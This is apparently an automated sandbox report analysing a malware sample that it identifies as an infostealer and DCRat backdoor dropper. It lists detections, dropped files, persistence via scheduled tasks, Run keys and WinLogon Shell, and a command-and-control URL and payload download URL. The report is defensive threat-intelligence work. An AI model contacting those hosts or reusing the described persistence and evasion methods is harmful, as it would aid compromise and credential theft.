                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572157 Sample: Wh2c6sgwRo.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 74 ip-api.com 2->74 76 dragonhack.shop 2->76 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 18 other signatures 2->94 9 Wh2c6sgwRo.exe 15 5 2->9         started        14 BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe 2->14         started        16 fontdrvhost.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 78 ip-api.com 208.95.112.1, 49704, 49707, 49711 TUT-ASUS United States 9->78 80 dragonhack.shop 91.149.219.45, 443, 49706 GECKONET-ASPL Poland 9->80 82 147.45.44.151, 49705, 5555 FREE-NET-ASFREEnetEU Russian Federation 9->82 66 C:\Users\user\AppData\...\d3yngi1q.wji.exe, PE32 9->66 dropped 68 C:\Users\user\AppData\...\Wh2c6sgwRo.exe.log, ASCII 9->68 dropped 108 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->108 110 Found many strings related to Crypto-Wallets (likely being stolen) 9->110 112 Self deletion via cmd or bat file 9->112 114 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->114 20 d3yngi1q.wji.exe 21 28 9->20         started        24 cmd.exe 1 9->24         started        84 147.45.47.151, 49713, 49714, 49715 FREE-NET-ASFREEnetEU Russian Federation 14->84 116 Multi AV Scanner detection for dropped file 14->116 118 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 14->118 120 Tries to harvest and steal browser information (history, passwords, etc) 14->120 122 Antivirus detection for dropped file 16->122 124 Machine Learning detection for dropped file 16->124 86 127.0.0.1 unknown unknown 18->86 file6 signatures7 process8 file9 58 C:\...\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PE32 20->58 dropped 60 C:\...\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PE32 20->60 dropped 62 C:\ProgramData\fontdrvhost.exe, PE32 20->62 dropped 64 4 other malicious files 20->64 dropped 96 Antivirus detection for dropped file 20->96 98 Multi AV Scanner detection for dropped file 20->98 100 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->100 106 7 other signatures 20->106 26 csc.exe 4 20->26         started        30 csc.exe 4 20->30         started        32 cmd.exe 20->32         started        38 5 other processes 20->38 102 Uses ping.exe to sleep 24->102 104 Uses ping.exe to check the status of other devices and networks 24->104 34 conhost.exe 24->34         started        36 choice.exe 1 24->36         started        signatures10 process11 file12 70 C:\Program Files (x86)\...\msedge.exe, PE32 26->70 dropped 126 Infects executable files (exe, dll, sys, html) 26->126 40 conhost.exe 26->40         started        42 cvtres.exe 1 26->42         started        72 C:\Windows\...\SecurityHealthSystray.exe, PE32 30->72 dropped 44 conhost.exe 30->44         started        46 cvtres.exe 1 30->46         started        128 Uses ping.exe to sleep 32->128 54 4 other processes 32->54 130 Loading BitLocker PowerShell Module 38->130 48 conhost.exe 38->48         started        50 conhost.exe 38->50         started        52 conhost.exe 38->52         started        56 3 other processes 38->56 signatures13 process14

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Wh2c6sgwRo.exe63%ReversingLabsByteCode-MSIL.Infostealer.Tinba
                                Wh2c6sgwRo.exe78%VirustotalBrowse
                                Wh2c6sgwRo.exe100%AviraTR/Dropper.Gen
                                Wh2c6sgwRo.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\fontdrvhost.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat100%AviraBAT/Delbat.C
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%AviraHEUR/AGEN.1309961
                                C:\ProgramData\fontdrvhost.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%Joe Sandbox ML
                                C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe75%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe75%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\ProgramData\fontdrvhost.exe75%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe75%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe75%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe75%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt00%Avira URL Cloudsafe
                                http://dragonhack.shop0%Avira URL Cloudsafe
                                https://dragonhack.shop/done.exe0%Avira URL Cloudsafe
                                https://ion=v4.5V0%Avira URL Cloudsafe
                                http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php0%Avira URL Cloudsafe
                                http://crl.mic0%Avira URL Cloudsafe
                                https://dragonhack.shop0%Avira URL Cloudsafe
                                http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                                http://crl.micNb0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                ip-api.com
                                		208.95.112.1
                                		truefalse
                                  		high
                                  dragonhack.shop
                                  		91.149.219.45
                                  		truefalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.phptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dragonhack.shop/done.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ip-api.com/json/false
                                      		high
                                      http://ip-api.com/line/?fields=hostingfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/chrome_newtabWh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                          		high
                                          http://nuget.org/NuGet.exepowershell.exe, 0000001D.00000002.2834190547.00000199CAEB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2794361649.000001CA27DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2762678557.0000015FBD554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2760012226.000001B5C96C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoWh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001D.00000002.1758206662.00000199BB067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17F67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9879000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://dragonhack.shopWh2c6sgwRo.exe, 00000000.00000002.1609904365.000001906200A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://contoso.com/Licensepowershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.micpowershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contoso.com/Iconpowershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                                            		high
                                                            https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000031.00000003.1777211358.000002154D760000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.49.drfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                                                  		high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ion=v4.5Vpowershell.exe, 00000026.00000002.3041543607.0000021336C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                                                      		high
                                                                      https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000031.00000003.1777211358.000002154D7D1000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.49.drfalse
                                                                        		high
                                                                        http://crl.mpowershell.exe, 0000001F.00000002.3012073469.000001CA2FDE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3049977867.0000015FC586B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001D.00000002.1758206662.00000199BB067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17F67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9879000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contoso.com/powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 0000001D.00000002.2834190547.00000199CAEB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2794361649.000001CA27DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2762678557.0000015FBD554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2760012226.000001B5C96C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://ip-api.comWh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622DE000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622F7000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061E0B000.00000004.00000800.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.micft.cMicRosofpowershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://aka.ms/pscore68powershell.exe, 0000001D.00000002.1758206662.00000199BAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131E8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://dragonhack.shopWh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061F57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1758206662.00000199BAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131E8B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drfalse
                                                                                          		high
                                                                                          http://crl.micNbpowershell.exe, 00000026.00000002.3079398788.0000021336D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          208.95.112.1
                                                                                          		ip-api.comUnited States
                                                                                          		53334TUT-ASUSfalse
                                                                                          147.45.44.151
                                                                                          		unknownRussian Federation
                                                                                          		2895FREE-NET-ASFREEnetEUfalse
                                                                                          91.149.219.45
                                                                                          		dragonhack.shopPoland
                                                                                          		198401GECKONET-ASPLfalse
                                                                                          147.45.47.151
                                                                                          		unknownRussian Federation
                                                                                          		2895FREE-NET-ASFREEnetEUtrue

                                                                                          Private

                                                                                          IP
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1572157
                                                                                          Start date and time:2024-12-10 07:26:42 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 11m 0s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:57
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Wh2c6sgwRo.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:43d30c776f593efdf5416ab4142442d6.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@54/78@4/5
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 8.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 56%
                                                                                          • Number of executed functions: 382
                                                                                          • Number of non-executed functions: 13
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 2292 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 3344 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 4100 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 6708 because it is empty
                                                                                          • Execution Graph export aborted for target BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, PID 8052 because it is empty
                                                                                          • Execution Graph export aborted for target Wh2c6sgwRo.exe, PID 7520 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 2352 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 2616 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 3116 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 7976 because it is empty
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 8068 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          01:27:40API Interceptor78x Sleep call for process: Wh2c6sgwRo.exe modified
                                                                                          01:27:58API Interceptor1x Sleep call for process: d3yngi1q.wji.exe modified
                                                                                          01:28:00API Interceptor160x Sleep call for process: powershell.exe modified
                                                                                          01:28:11API Interceptor662064x Sleep call for process: BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe modified
                                                                                          01:28:14API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                          07:27:56Task SchedulerRun new task: BQrPGmkzolSuiSkMAkyslxsiiFSSM path: "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:27:57Task SchedulerRun new task: BQrPGmkzolSuiSkMAkyslxsiiFSSMB path: "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:27:57Task SchedulerRun new task: fontdrvhost path: "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:27:57Task SchedulerRun new task: fontdrvhostf path: "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:27:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:28:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:28:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:28:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:28:34AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:28:42AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run BQrPGmkzolSuiSkMAkyslxsiiFSSM "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:28:59AutostartRun: WinLogon Shell "C:\Users\All Users\fontdrvhost.exe"
                                                                                          07:29:07AutostartRun: WinLogon Shell "C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:29:15AutostartRun: WinLogon Shell "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:29:24AutostartRun: WinLogon Shell "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                                                                          07:29:32AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          208.95.112.1mu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                          • ip-api.com/json/
                                                                                          interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                          • ip-api.com/json/?fields=8195
                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          run.cmdGet hashmaliciousUnknownBrowse
                                                                                          • ip-api.com/json/?fields=8195
                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • ip-api.com/line/?fields=hosting
                                                                                          YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                          • ip-api.com/json/
                                                                                          file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                          • ip-api.com/json/?fields=225545

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ip-api.commu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                          • 208.95.112.1
                                                                                          interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                          • 208.95.112.1
                                                                                          run.cmdGet hashmaliciousUnknownBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                          • 208.95.112.1
                                                                                          f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                          • 208.95.112.1
                                                                                          R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 208.95.112.1
                                                                                          YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                          • 208.95.112.1

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          GECKONET-ASPLppc.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          hmips.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          ppc.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          harm5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
